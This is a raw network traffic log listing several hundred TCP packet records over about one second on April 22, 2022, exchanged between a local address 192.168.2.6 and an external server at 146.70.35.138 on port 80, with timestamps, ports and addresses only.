Apr 22, 2022 16:15:22.705044985 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.705167055 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.711971998 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.715708971 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.743139029 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.743174076 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.743194103 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.743217945 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.743232965 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.743237972 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.743254900 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.743257046 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.743340015 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.743483067 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.743505955 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.743522882 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.743544102 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.743566990 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.743627071 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.744040012 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.744064093 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.744080067 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.744123936 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.744146109 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.744159937 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.744405031 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.744431019 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.744987011 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.811302900 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.834933043 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.208308935 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.208345890 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.208362103 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.208378077 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.208395958 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.208409071 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.208468914 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.208470106 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.208487034 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.208488941 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.208502054 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.208631039 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.208657026 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.208671093 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.208694935 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.208705902 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.208709002 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.208894014 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.208909035 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.211312056 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.211329937 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.248522997 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248558998 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248574972 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248594046 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248615980 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248627901 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248689890 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.248692036 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248706102 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.248759031 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248771906 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248785019 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248802900 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248811007 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248831034 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.248841047 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.248936892 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248958111 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248972893 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.248980045 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.248999119 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.249094963 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.249113083 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.249125957 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.249138117 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.249145985 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.249192953 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.249283075 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.249741077 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.289258957 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.289287090 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.289299965 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.289318085 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.289335012 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.289350033 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.289482117 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.289554119 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.289580107 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.289589882 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.289603949 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.289623976 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.289642096 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.289655924 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.289729118 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.289736986 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.289777994 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.289793968 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.289885044 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.329330921 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.329359055 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.329371929 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.329390049 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.329407930 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.329423904 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.329464912 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.329479933 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.329587936 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.329848051 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.329875946 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.329899073 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.329936028 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.329962015 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.329966068 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.329973936 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.329977036 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.330044031 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.330199957 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.330225945 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.330238104 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.330287933 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.330358982 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.330378056 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.330391884 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.330467939 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.330476046 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.330545902 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.330630064 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.330637932 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.369472027 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.369498968 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.369512081 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.369524956 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.369543076 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.369556904 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.369633913 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.369668961 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.369668961 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.369688988 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.369702101 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.369712114 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.369856119 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.369883060 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.369931936 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.369952917 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.369967937 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.370060921 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.370079994 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.370099068 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.370114088 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.370131969 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.370132923 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.370147943 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.370150089 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.370179892 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.370286942 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.370295048 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.370349884 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.370389938 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.370405912 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.370409012 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.370424032 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.370440006 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.370495081 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.370501995 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.370505095 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.409811020 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.409847021 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.409861088 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.409879923 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.409893036 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.409950972 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.409979105 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.409993887 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.409996986 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.410001040 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.410007954 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.410223007 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.410228014 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.410248041 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.410260916 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.410315037 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.410321951 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.410342932 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.410365105 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.410379887 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.410424948 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.410434961 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.410465956 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.410482883 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.410497904 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.410645962 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.410661936 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.410687923 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.410701990 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.410706043 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.410708904 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.449749947 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.449786901 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.449805975 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.449825048 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.449840069 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.449939013 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.449985027 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.450033903 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.450058937 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.450074911 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.450100899 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.450119019 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.450129032 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.450133085 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.450148106 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.450186968 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.450192928 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.450198889 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.450206041 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.450220108 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.450289965 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.450299025 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.450459003 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.450524092 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.450544119 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.450556040 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.450563908 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.450577974 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.450633049 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.450642109 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.450644970 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.489650011 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.489686966 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.489705086 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.489722013 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.489741087 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.489753962 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.489830017 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.490000963 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490044117 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490057945 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490062952 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.490077019 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.490094900 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490113974 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490128040 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490183115 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.490191936 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.490334988 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490370035 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490384102 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490425110 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.490426064 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490449905 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490458965 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490525961 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490530968 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.490555048 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.490586996 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490601063 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490639925 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490657091 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.490664959 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.490672112 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.490804911 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.490813971 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.529990911 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530034065 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530050039 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530066013 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530088902 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530107975 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530131102 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530153036 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530191898 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530222893 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.530241966 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.530245066 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.530312061 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530335903 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530349016 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530371904 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530396938 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530415058 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530433893 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.530442953 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.530445099 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.530544996 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530571938 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530590057 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530627012 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.530637026 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.530639887 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.530669928 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530920982 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530949116 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530966043 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530972958 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.530989885 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.530998945 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.531002998 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.531008005 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.531054020 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.531055927 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.570005894 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570038080 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570051908 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570070028 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570082903 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570163965 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.570197105 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570203066 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.570214987 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570229053 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570295095 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.570301056 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.570312023 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570331097 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570597887 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570619106 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570632935 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570664883 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.570682049 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.570686102 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.570708990 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570722103 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570980072 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.570997953 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.571011066 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.571024895 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.571027994 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.571036100 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.571038961 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.571043015 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.571048021 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.571060896 CEST	80	49750	146.70.35.138	192.168.2.6
